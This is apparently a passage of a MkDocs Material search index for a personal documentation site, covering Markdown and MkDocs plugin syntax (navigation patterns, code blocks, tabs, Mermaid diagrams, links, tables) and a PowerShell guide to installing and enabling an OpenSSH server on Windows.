Page 1 Rest Introduction Page 2 Folder Introduction Page 3 Page 4 Furthermore, it is possible to filter the remaining items using glob patterns or regular expressions. For example to match only files named introduction.md
.
nav:\n- Introductions:\n- ... | **/introduction.md\n- ...\n
With the following result:
Introductions Introduction Introduction Page 1 Page 2 Folder Note: The pattern is checked against the path relative to the docs directory.
For more details refer to the Rest Filter Patterns section below.
By default, remaining items keep their hierarchical structure. You may add flat
to flatten all the matching pages:
nav:\n- page1.md\n- Rest:\n- ... | flat | **/introduction.md\n- ... | flat\n
Page 1 Rest Introduction Introduction Page 2 Page 3 Page 4
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#rest-filter-patterns", "title": "Rest Filter Patterns", "text": "In all places where the rest entry (...
) is allowed, you can also include a glob pattern or regular expression to filter the items to be displayed.
nav:\n- ... | page-*.md\n- ... | regex=page-[0-9]+.md\n
The filter only operates on remaining items. This means it will not include items that are explicitly listed in the navigation or items that are matched by another filter that appears earlier in the configuration.
You may also include a rest entry without filter to act as a catch-all, inserting everything that is not matched by a filter.
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#syntax-details", "title": "Syntax Details", "text": "Unless the filter starts with regex=
it is interpreted as glob pattern, however you may also explicitly say so using glob=
. The spaces around ...
are optional but recommended for readability.
Note: Depending on the characters in your filter, you might also need to use quotes around the whole entry.
nav:\n# equivalent glob entries\n- ... | page-*.md\n- ... | glob=page-*.md\n- ...|page-*.md\n- '... | page-*.md'\n\n# equivalent regex entries\n- ... | regex=page-[0-9]+.md\n- ...|regex=page-[0-9]+.md\n- '... | regex=page-[0-9]+.md'\n
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#options", "title": "Options", "text": "You may customize the plugin by passing options in mkdocs.yml
:
plugins:\n- awesome-pages:\nfilename: .index\ncollapse_single_pages: true\nstrict: false\norder: asc\nsort_type: natural\norder_by: title\n
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#filename", "title": "filename
", "text": "Name of the file used to configure pages of a directory. Default is .pages
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#collapse_single_pages", "title": "collapse_single_pages
", "text": "Enable the collapsing of single nested pages. Default is false
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#strict", "title": "strict
", "text": "Raise errors instead of warnings when:
arrange
entries cannot be found nav
entries cannot be found Default is true
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#order-sort_type-and-order_by", "title": "order
, sort_type
and order_by
", "text": "Global fallback values for the Meta attributes. Default is None
or filename
.
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/", "title": "Markdown Basic Formatting", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#text-styling", "title": "Text Styling", "text": "Markdown makes it easy to format messages. Type a message as you normally would, then use these the following formatting syntax to render the message a specific way
Markdown Syntax Result **bold**
bold _italic_
italic ==highlight==
highlight ~~strike through~~
strike through ^^underline^^
underline `Inline Code`
Inline Code
==_you_ **can** ^^combine^^ `too`==
you can combine too
", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#horizontal-line", "title": "Horizontal Line", "text": "Horizontal Line ExampleHorizontal line\n\n---\n\nThree consecutive dashes\n
Result:
Horizontal line
Three consecutive dashes
", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#heading", "title": "Heading", "text": "To create a heading, add number signs (#) in front of a word or phrase. The number of number signs you use should correspond to the heading level. For example, to create a heading level three (h3), use three number signs (e.g., ### My Header).
Headings from h1
through h6
are constructed with a #
for each level:
", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#regular-headings", "title": "Regular Headings", "text": "Regular Headings (h1-h6)### Heading 3\n\n#### Heading 4\n\n##### Heading 5\n\n###### Heading 6\n
Result:
", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#heading-3", "title": "Heading 3", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#heading-4", "title": "Heading 4", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#heading-5", "title": "Heading 5", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#heading-6", "title": "Heading 6", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#headings-with-secondary-text", "title": "Headings with secondary text", "text": "Headings with secondary text (h1-h6)### Heading 3 <small>with secondary text</small>\n\n#### Heading 4 <small>with secondary text</small>\n\n##### Heading 5 <small>with secondary text</small>\n\n###### Heading 5 <small>with secondary text</small>\n
Result:
", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#heading-3-with-secondary-text", "title": "Heading 3 with secondary text", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#heading-4-with-secondary-text", "title": "Heading 4 with secondary text", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#heading-5-with-secondary-text", "title": "Heading 5 with secondary text", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/basic-formatting/#heading-6-with-secondary-text", "title": "Heading 6 with secondary text", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "headings", "text-highlighting", "horizontal-line"]}, {"location": "utilities/markdown-cheatsheet/code-blocks/", "title": "Markdown Code Blocks", "text": "Code blocks and examples are an essential part of technical project documentation. Material for MkDocs provides different ways to set up syntax highlighting for code blocks, either during build time using [Pygments] or during runtime using a JavaScript syntax highlighter.
", "tags": ["markdown-cheatsheet", "mkdocs", "code-blocks"]}, {"location": "utilities/markdown-cheatsheet/code-blocks/#adding-a-title", "title": "Adding a Title", "text": "In order to provide additional context, a custom title can be added to a code block by using the title=\"<custom title>\"
option directly after the shortcode, e.g. to display the name of a file:
Example:
Code block with title```py title=\"bubble_sort.py\"\ndef bubble_sort(items):\n for i in range(len(items)):\n for j in range(len(items) - 1 - i):\n if items[j] > items[j + 1]:\n items[j], items[j + 1] = items[j + 1], items[j]\n```\n
Result:
bubble_sort.pydef bubble_sort(items):\n for i in range(len(items)):\n for j in range(len(items) - 1 - i):\n if items[j] > items[j + 1]:\n items[j], items[j + 1] = items[j + 1], items[j]\n
", "tags": ["markdown-cheatsheet", "mkdocs", "code-blocks"]}, {"location": "utilities/markdown-cheatsheet/code-blocks/#adding-line-numbers-to-code-block", "title": "Adding Line Numbers To Code Block", "text": "Example:
Line numbers can be added to a code block by using the linenums=\"<start>\"
option directly after the shortcode, whereas <start>
represents the starting line number. A code block can start from a line number other than 1
, which allows to split large code blocks for readability:
Code block with line numbers```py linenums=\"1\"\ndef bubble_sort(items):\n for i in range(len(items)):\n for j in range(len(items) - 1 - i):\n if items[j] > items[j + 1]:\n items[j], items[j + 1] = items[j + 1], items[j]\n```\n
Result:
def bubble_sort(items):\nfor i in range(len(items)):\nfor j in range(len(items) - 1 - i):\nif items[j] > items[j + 1]:\nitems[j], items[j + 1] = items[j + 1], items[j]\n
", "tags": ["markdown-cheatsheet", "mkdocs", "code-blocks"]}, {"location": "utilities/markdown-cheatsheet/code-blocks/#highlighting-specific-lines", "title": "Highlighting Specific Lines", "text": "Specific lines can be highlighted by passing the line numbers to the hl_lines
argument placed right after the language shortcode. Note that line counts start at 1
.
Code block with highlighted lines```py hl_lines=\"2 3\"\ndef bubble_sort(items):\n for i in range(len(items)):\n for j in range(len(items) - 1 - i):\n if items[j] > items[j + 1]:\n items[j], items[j + 1] = items[j + 1], items[j]\n```\n
Result:
def bubble_sort(items):\nfor i in range(len(items)):\nfor j in range(len(items) - 1 - i):\nif items[j] > items[j + 1]:\nitems[j], items[j + 1] = items[j + 1], items[j]\n
", "tags": ["markdown-cheatsheet", "mkdocs", "code-blocks"]}, {"location": "utilities/markdown-cheatsheet/code-blocks/#highlighting-inline-code-blocks", "title": "Highlighting Inline Code Blocks", "text": "When InlineHilite
is enabled, syntax highlighting can be applied to inline code blocks by prefixing them with a shebang, i.e. #!
, directly followed by the corresponding language shortcode
Example:
Inline code blockThe `#!python range()` function is used to generate a sequence of numbers.\n
Result:
The range()
function is used to generate a sequence of numbers.
", "tags": ["markdown-cheatsheet", "mkdocs", "code-blocks"]}, {"location": "utilities/markdown-cheatsheet/content-tabs/", "title": "Markdown Content Tabs", "text": "Sometimes, it's desirable to group alternative content under different tabs, e.g. when describing how to access an API from different languages or environments. Material for MkDocs allows for beautiful and functional tabs, grouping code blocks and other content.
", "tags": ["markdown-cheatsheet", "mkdocs", "content-tabs"]}, {"location": "utilities/markdown-cheatsheet/content-tabs/#usage", "title": "Usage", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "content-tabs"]}, {"location": "utilities/markdown-cheatsheet/content-tabs/#grouping-code-blocks", "title": "Grouping code blocks", "text": "Code blocks are one of the primary targets to be grouped, and can be considered a special case of content tabs, as tabs with a single code block are always rendered without horizontal spacing:
Example:
Content tabs with code blocks=== \"C\"\n\n ``` c\n #include <stdio.h>\n\n int main(void) {\n printf(\"Hello world!\\n\");\n return 0;\n }\n ```\n\n=== \"C++\"\n\n ``` c++\n #include <iostream>\n\n int main(void) {\n std::cout << \"Hello world!\" << std::endl;\n return 0;\n }\n ```\n
Result:
CC++ #include <stdio.h>\n\nint main(void) {\nprintf(\"Hello world!\\n\");\nreturn 0;\n}\n
#include <iostream>\n\nint main(void) {\nstd::cout << \"Hello world!\" << std::endl;\nreturn 0;\n}\n
", "tags": ["markdown-cheatsheet", "mkdocs", "content-tabs"]}, {"location": "utilities/markdown-cheatsheet/content-tabs/#grouping-other-content", "title": "Grouping other content", "text": "When a content tab contains more than one code block, it is rendered with horizontal spacing. Vertical spacing is never added, but can be achieved by nesting tabs in other blocks:
Example:
Content tabs=== \"Unordered list\"\n\n * Sed sagittis eleifend rutrum\n * Donec vitae suscipit est\n * Nulla tempor lobortis orci\n\n=== \"Ordered list\"\n\n 1. Sed sagittis eleifend rutrum\n 2. Donec vitae suscipit est\n 3. Nulla tempor lobortis orci\n
Result:
Unordered listOrdered list Sed sagittis eleifend rutrum Donec vitae suscipit est Nulla tempor lobortis orci Sed sagittis eleifend rutrum Donec vitae suscipit est Nulla tempor lobortis orci ", "tags": ["markdown-cheatsheet", "mkdocs", "content-tabs"]}, {"location": "utilities/markdown-cheatsheet/content-tabs/#embedded-content", "title": "Embedded content", "text": "When [SuperFences] is enabled, content tabs can contain arbitrary nested content, including further content tabs, and can be nested in other blocks like [admonitions] or blockquotes:
Example:
Content tabs in admonition!!! example\n\n === \"Unordered List\"\n\n ``` markdown\n * Sed sagittis eleifend rutrum\n * Donec vitae suscipit est\n * Nulla tempor lobortis orci\n ```\n\n === \"Ordered List\"\n\n ``` markdown\n 1. Sed sagittis eleifend rutrum\n 2. Donec vitae suscipit est\n 3. Nulla tempor lobortis orci\n ```\n
Result:
Example
Unordered ListOrdered List * Sed sagittis eleifend rutrum\n* Donec vitae suscipit est\n* Nulla tempor lobortis orci\n
1. Sed sagittis eleifend rutrum\n2. Donec vitae suscipit est\n3. Nulla tempor lobortis orci\n
", "tags": ["markdown-cheatsheet", "mkdocs", "content-tabs"]}, {"location": "utilities/markdown-cheatsheet/diagrams/", "title": "Mermaid Diagrams", "text": "Diagrams help to communicate complex relationships and interconnections between different technical components, and are a great addition to project documentation. Material for MkDocs integrates with Mermaid.js, a very popular and flexible solution for drawing diagrams.
", "tags": ["markdown-cheatsheet", "mkdocs", "diagram", "mermaid"]}, {"location": "utilities/markdown-cheatsheet/diagrams/#usage", "title": "Usage", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "diagram", "mermaid"]}, {"location": "utilities/markdown-cheatsheet/diagrams/#using-flowcharts", "title": "Using Flowcharts", "text": "Flowcharts are diagrams that represent workflows or processes. The steps are rendered as nodes of various kinds and are connected by edges, describing the necessary order of steps:
Flow chart```mermaid\ngraph LR\n A[Start] --> B{Error?};\n B -->|Yes| C[Hmm...];\n C --> D[Debug];\n D --> B;\n B ---->|No| E[Yay!];\n```\n
Result:
graph LR\n A[Start] --> B{Error?};\n B -->|Yes| C[Hmm...];\n C --> D[Debug];\n D --> B;\n B ---->|No| E[Yay!];
", "tags": ["markdown-cheatsheet", "mkdocs", "diagram", "mermaid"]}, {"location": "utilities/markdown-cheatsheet/diagrams/#using-sequence-diagrams", "title": "Using Sequence Diagrams", "text": "Sequence diagrams describe a specific scenario as sequential interactions between multiple objects or actors, including the messages that are exchanged between those actors:
Sequence diagram```mermaid\nsequenceDiagram\n Alice->>John: Hello John, how are you?\n loop Healthcheck\n John->>John: Fight against hypochondria\n end\n Note right of John: Rational thoughts!\n John-->>Alice: Great!\n John->>Bob: How about you?\n Bob-->>John: Jolly good!\n```\n
Result:
sequenceDiagram\n Alice->>John: Hello John, how are you?\n loop Healthcheck\n John->>John: Fight against hypochondria\n end\n Note right of John: Rational thoughts!\n John-->>Alice: Great!\n John->>Bob: How about you?\n Bob-->>John: Jolly good!
", "tags": ["markdown-cheatsheet", "mkdocs", "diagram", "mermaid"]}, {"location": "utilities/markdown-cheatsheet/diagrams/#using-state-diagrams", "title": "Using State Diagrams", "text": "State diagrams are a great tool to describe the behavior of a system, decomposing it into a finite number of states, and transitions between those states:
State diagram```mermaid\nstateDiagram-v2\n state fork_state <<fork>>\n [*] --> fork_state\n fork_state --> State2\n fork_state --> State3\n\n state join_state <<join>>\n State2 --> join_state\n State3 --> join_state\n join_state --> State4\n State4 --> [*]\n```\n
Result:
stateDiagram-v2\n state fork_state <<fork>>\n [*] --> fork_state\n fork_state --> State2\n fork_state --> State3\n\n state join_state <<join>>\n State2 --> join_state\n State3 --> join_state\n join_state --> State4\n State4 --> [*]
", "tags": ["markdown-cheatsheet", "mkdocs", "diagram", "mermaid"]}, {"location": "utilities/markdown-cheatsheet/diagrams/#using-class-diagrams", "title": "Using Class Diagrams", "text": "Class diagrams are central to object oriented programing, describing the structure of a system by modelling entities as classes and relationships between them:
Class diagram```mermaid\nclassDiagram\n Person <|-- Student\n Person <|-- Professor\n Person : +String name\n Person : +String phoneNumber\n Person : +String emailAddress\n Person: +purchaseParkingPass()\n Address \"1\" <-- \"0..1\" Person:lives at\n class Student{\n +int studentNumber\n +int averageMark\n +isEligibleToEnrol()\n +getSeminarsTaken()\n }\n class Professor{\n +int salary\n }\n class Address{\n +String street\n +String city\n +String state\n +int postalCode\n +String country\n -validate()\n +outputAsLabel()\n }\n```\n
Result:
classDiagram\n Person <|-- Student\n Person <|-- Professor\n Person : +String name\n Person : +String phoneNumber\n Person : +String emailAddress\n Person: +purchaseParkingPass()\n Address \"1\" <-- \"0..1\" Person:lives at\n class Student{\n +int studentNumber\n +int averageMark\n +isEligibleToEnrol()\n +getSeminarsTaken()\n }\n class Professor{\n +int salary\n }\n class Address{\n +String street\n +String city\n +String state\n +int postalCode\n +String country\n -validate()\n +outputAsLabel()\n }
", "tags": ["markdown-cheatsheet", "mkdocs", "diagram", "mermaid"]}, {"location": "utilities/markdown-cheatsheet/diagrams/#using-entity-relationship-diagrams", "title": "Using Entity-Relationship Diagrams", "text": "An entity-relationship diagram is composed of entity types and specifies relationships that exist between entities. It describes inter-related things in a specific domain of knowledge:
Entity-relationship diagram```mermaid\nerDiagram\n CUSTOMER ||--o{ ORDER : places\n ORDER ||--|{ LINE-ITEM : contains\n CUSTOMER }|..|{ DELIVERY-ADDRESS : uses\n```\n
Result:
erDiagram\n CUSTOMER ||--o{ ORDER : places\n ORDER ||--|{ LINE-ITEM : contains\n CUSTOMER }|..|{ DELIVERY-ADDRESS : uses
", "tags": ["markdown-cheatsheet", "mkdocs", "diagram", "mermaid"]}, {"location": "utilities/markdown-cheatsheet/external-markdown/", "title": "Embed External Markdown", "text": "MkDocs Embed External Markdown plugin that allows to inject section or full markdown content from a given url. The goal is to embed different markdown from different sources inside your MkDocs project.
For more detailed information follow the link: Mkdocs Embed External Markdown Plugin
", "tags": ["markdown-cheatsheet", "mkdocs", "external-markdown"]}, {"location": "utilities/markdown-cheatsheet/external-markdown/#usage", "title": "Usage", "text": " Section defined by \"##/###/####...\" header (h2/h3/h4...) \"#\" header (h1) will be removed from source content so you can use use your own header \"##/###/####...\" header (h2/h3/h4...) will be removed from source section content so you can use use your own header Supports multiple sections from any source external_markdown
requires 2 parameters: url and section name.
{{ external_markdown('url', '## section name') }}\n
", "tags": ["markdown-cheatsheet", "mkdocs", "external-markdown"]}, {"location": "utilities/markdown-cheatsheet/external-markdown/#full-markdown-content", "title": "Full Markdown Content", "text": "Embed full markdown content from a given url, you can use the following example:
{{ external_markdown('https://raw.githubusercontent.com/fire1ce/DDNS-Cloudflare-Bash/main/README.md', '') }}\n
", "tags": ["markdown-cheatsheet", "mkdocs", "external-markdown"]}, {"location": "utilities/markdown-cheatsheet/external-markdown/#specific-section", "title": "Specific Section", "text": "Embed markdown section from a given url, you can use the following example:
{{ external_markdown('https://raw.githubusercontent.com/fire1ce/DDNS-Cloudflare-Bash/main/README.md', '## Installation') }}\n
", "tags": ["markdown-cheatsheet", "mkdocs", "external-markdown"]}, {"location": "utilities/markdown-cheatsheet/icons/", "title": "Icons & Emojis", "text": "One of the best features of Material for MkDocs is the possibility to use more then with thousands of emojis in your project documentation with practically zero additional effort. Use Mkdocs Material Icon Search to find the icons and emojis you need.
", "tags": ["markdown-cheatsheet", "mkdocs", "icons", "emojis"]}, {"location": "utilities/markdown-cheatsheet/icons/#usage", "title": "Usage", "text": "Example:
:fontawesome-regular-bell: - Fontawesome Icon: Bell \n:material-bell: - Material Icon: Bell \n:octicons-bell-24: - Octicons Icon: Bell \n:bell: - Emoji: Bell\n
Result:
- Fontawesome Icon: Bell - Material Icon: Bell - Octicons Icon: Bell - Emoji: Bell
", "tags": ["markdown-cheatsheet", "mkdocs", "icons", "emojis"]}, {"location": "utilities/markdown-cheatsheet/icons/#keyboard-keys-icons", "title": "Keyboard Keys Icons", "text": "Example:
++ctrl+alt+del++\n
++cmd+control+option++\n
Result:
Ctrl+Alt+Del
Cmd+Ctrl+Option
", "tags": ["markdown-cheatsheet", "mkdocs", "icons", "emojis"]}, {"location": "utilities/markdown-cheatsheet/images/", "title": "Markdown Images", "text": "Markdown is a text format so naturally you can type in the Markdown representation of an image using examples below to put an image reference directly into the editor.
Warning
This site uses the Material Design for MkDocs theme with the following CSS overrides; therefore, the results in your case may differ.
Custom css /* images css */\n.md-typeset img {\nborder-radius: 5px;\nheight: auto;\nmax-width: 95%;\nmargin: auto;\ndisplay: block;\nbox-shadow: rgba(149, 157, 165, 0.2) 0px 8px 24px;\n}\n
", "tags": ["markdown-cheatsheet", "mkdocs", "images"]}, {"location": "utilities/markdown-cheatsheet/images/#embedding-images", "title": "Embedding Images", "text": "Internal soruce example![minion][internal-source]\n\n[internal-source]: /assets/images/markdown-cheatsheet/minion.png 'Title of the image'\n
External source example![minion][external-source]\n\n[external-source]: https://octodex.github.com/images/minion.png 'Title of the image'\n
Result:
", "tags": ["markdown-cheatsheet", "mkdocs", "images"]}, {"location": "utilities/markdown-cheatsheet/images/#embedding-images-with-width-attributes", "title": "Embedding Images With Width Attributes", "text": "width=200 example![minion][internal-source]{: style=\"width:200px\"}\n\n[internal-source]: /assets/images/markdown-cheatsheet/minion.png 'Title of the image'\n
Result:
", "tags": ["markdown-cheatsheet", "mkdocs", "images"]}, {"location": "utilities/markdown-cheatsheet/links/", "title": "Markdown Links", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "links"]}, {"location": "utilities/markdown-cheatsheet/links/#link-with-title", "title": "Link With Title", "text": "Link with Title Example[My Github Page][github-url]\n\n[github-url]: https://github.com/fire1ce 'Title of the link'\n
Result:
My Github Page
", "tags": ["markdown-cheatsheet", "mkdocs", "links"]}, {"location": "utilities/markdown-cheatsheet/links/#open-in-new-tab", "title": "Open In New Tab", "text": "Append (target=\\_blank)
to the end of the link.
Open In New Tab Link Example[My Github Page][github-url]{target=\\_blank}\n\n[github-url]: https://github.com/fire1ce 'Title of the link'\n
Result:
My Github Page
Result:
", "tags": ["markdown-cheatsheet", "mkdocs", "links"]}, {"location": "utilities/markdown-cheatsheet/links/#internal-anchor-links", "title": "Internal Anchor Links", "text": "Internal Anchor Links Example[Jumps to section in page][internal-anchor-link]\n\n[internal-anchor-link]: /utilities/markdown-cheatsheet/tables-lists-quotes/#lists 'Internal Anchor Links'\n
Result:
Jumps to section in page
", "tags": ["markdown-cheatsheet", "mkdocs", "links"]}, {"location": "utilities/markdown-cheatsheet/links/#image-with-links", "title": "Image With Links", "text": "Image With Links Example[![This is Image with link][image-link]][url-link]{target=\\_blank}\n\n[image-link]: /assets/images/markdown-cheatsheet/minion200x200.png 'Minion'\n[url-link]: https://github.com/fire1ce 'Go to Github'\n
Result:
", "tags": ["markdown-cheatsheet", "mkdocs", "links"]}, {"location": "utilities/markdown-cheatsheet/links/#mailto-link", "title": "Mailto
Link", "text": "Mailto Link Example[Send Email][mail-to-link]\n\n[mail-to-link]: mailto:example@example.com 'Send Email'\n
Result:
Send Email
", "tags": ["markdown-cheatsheet", "mkdocs", "links"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/", "title": "Tables, Lists and Quotes", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/#tables", "title": "Tables", "text": "A table in Markdown consists of two parts: the header and the rows of data in the table. As per the Markdown spec:
pipe (|) character separates the individual columns in a table. (-) hyphens act as a delimiter row to separate the header row from the body. (:) colon to align cell contents. Table Example| **Option** | **Description** |\n| ---------- | ------------------------------------------ |\n| data | path to data files to supply the data. |\n| engine | engine to be used for processing templates |\n| ext | extension to be used for dest files. |\n
Result:
Option Description data path to data files to supply the data. engine engine to be used for processing templates ext extension to be used for dest files.", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/#column-alignment", "title": "Column Alignment", "text": "If you want to align a specific column to the left
, center
or right
, you can use the [regular Markdown syntax] placing :
characters at the beginning and/or end of the divider.
LeftCenterRight Data table, columns aligned to left| Method | Description |\n| :---------- | :----------------------------------- |\n| `GET` | :material-check: Fetch resource |\n| `PUT` | :material-check-all: Update resource |\n| `DELETE` | :material-close: Delete resource |\n
Method Description GET
Fetch resource PUT
Update resource DELETE
Delete resource Data table, columns centered| Method | Description |\n| :---------: | :----------------------------------: |\n| `GET` | :material-check: Fetch resource |\n| `PUT` | :material-check-all: Update resource |\n| `DELETE` | :material-close: Delete resource |\n
Method Description GET
Fetch resource PUT
Update resource DELETE
Delete resource Data table, columns aligned to right| Method | Description |\n| ----------: | -----------------------------------: |\n| `GET` | :material-check: Fetch resource |\n| `PUT` | :material-check-all: Update resource |\n| `DELETE` | :material-close: Delete resource |\n
Method Description GET
Fetch resource PUT
Update resource DELETE
Delete resource", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/#lists", "title": "Lists", "text": "", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/#unordered-list", "title": "Unordered List", "text": "Bullet point lists can be created by starting each line with an asterisk followed by a space before the content of the bullet point. Note that the space is important and should not be forgotten.
Example:
Unordered List Example- Lorem ipsum dolor sit amet\n- Consectetur adipiscing elit\n- Integer molestie lorem at massa\n- Facilisis in pretium nisl aliquet\n
Result:
Lorem ipsum dolor sit amet Consectetur adipiscing elit Integer molestie lorem at massa Facilisis in pretium nisl aliquet ", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/#ordered-list", "title": "Ordered List", "text": "Similarly, numbered lists can be created by starting each line with a number followed by a space and then the relevant text.
Ordered List Example1. Lorem ipsum dolor sit amet\n2. Consectetur adipiscing elit\n3. Integer molestie lorem at massa\n4. Faucibus porta lacus fringilla vel\n5. Aenean sit amet erat nunc\n6. Eget porttitor lorem\n
Result:
Lorem ipsum dolor sit amet Consectetur adipiscing elit Integer molestie lorem at massa Faucibus porta lacus fringilla vel Aenean sit amet erat nunc Eget porttitor lorem ", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/#blocks-list", "title": "Blocks List", "text": "Blocks List Example> - list under lists\n> - under lists\n
Result:
list under lists under lists ", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/#tasklists", "title": "Tasklists", "text": "A task list is a set of tasks that each render on a separate line with a clickable checkbox. You can select or deselect the checkboxes to mark the tasks as complete or incomplete.
You can use Markdown to create a task list in any comment on GitHub. If you reference an issue, pull request, or discussion in a task list, the reference will unfurl to show the title and state.
Example:
Task List Example- [x] Lorem ipsum dolor sit amet, consectetur adipiscing elit\n- [ ] Vestibulum convallis sit amet nisi a tincidunt\n - [x] In hac habitasse platea dictumst\n - [x] In scelerisque nibh non dolor mollis congue sed et metus\n - [ ] Praesent sed risus massa\n- [ ] Aenean pretium efficitur erat, donec pharetra, ligula non scelerisque\n
Result:
Lorem ipsum dolor sit amet, consectetur adipiscing elit Vestibulum convallis sit amet nisi a tincidunt In hac habitasse platea dictumst In scelerisque nibh non dolor mollis congue sed et metus Praesent sed risus massa Aenean pretium efficitur erat, donec pharetra, ligula non scelerisque ", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/#block-quotes", "title": "Block Quotes", "text": "For quoting blocks of content from another source within your document.
Add >
before any text you want to quote.
Quoting Blocks Example> Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante.\n> Donec massa lacus, ultricies a ullamcorper in, fermentum sed augue.\n
Result:
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante. Donec massa lacus, ultricies a ullamcorper in, fermentum sed augue.
", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "utilities/markdown-cheatsheet/tables-lists-quotes/#nested-block-quotes", "title": "Nested Block Quotes", "text": "Quoting Blocks Nested Example> Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante.\n> Donec massa lacus, ultricies a ullamcorper in, fermentum sed augue.\n>\n> > Sed adipiscing elit vitae augue consectetur a gravida nunc vehicula. Donec auctorodio\n> > non est accumsan facilisis. Aliquam id turpis in dolor tincidunt mollis ac eu diam.\n
Result:
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante. Donec massa lacus, ultricies a ullamcorper in, fermentum sed augue.
Sed adipiscing elit vitae augue consectetur a gravida nunc vehicula. Donec auctorodio non est accumsan facilisis. Aliquam id turpis in dolor tincidunt mollis ac eu diam.
", "tags": ["markdown-cheatsheet", "mkdocs", "tables", "lists", "quotes"]}, {"location": "windows/ssh-server/", "title": "Windows SSH Server", "text": "Sometime you need to connect to a remote server via SSH
. Usually it's the main connection to linux servers. But you can also connect to a windows server via SSH
In this guide we will show you how to install and configure a Windows SSH server, including SSH Keys authentication
.
", "tags": ["windows", "ssh-server", "powershell", "rsa-keys"]}, {"location": "windows/ssh-server/#ssh-server-installation-on-windows", "title": "SSH Server Installation on Windows", "text": "We will be using PowerShell to install the SSH server inculding the SSH client.
Open PowerShell Terminal as Administrator.
Run the following commands to install the SSH server and client.
Add-WindowsCapability -Online -Name OpenSSH.Client~~~~0.0.1.0\nAdd-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0\n
After the installation you can check that the Windows SSH server and client are installed.
Get-WindowsCapability -Online | Where-Object Name -like 'OpenSSH*'\n
The output will be something like this:
To start the Windows SSH server service
Start-Service sshd\n
Enable Windows SSH Server on Windows Boot
Set-Service -Name sshd -StartupType 'Automatic'\n
Add a Firewall rule to allow the SSH port
if (!(Get-NetFirewallRule -Name \"OpenSSH-Server-In-TCP\" -ErrorAction SilentlyContinue | Select-Object Name, Enabled)) { Write-Output \"Firewall Rule 'OpenSSH-Server-In-TCP' does not exist, creating it...\" New-NetFirewallRule -Name 'OpenSSH-Server-In-TCP' -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22 } else { Write-Output \"Firewall rule 'OpenSSH-Server-In-TCP' has been created and exists.\" }\n
At this point you should be able to connect via SSH to the Windows server with your username and password.
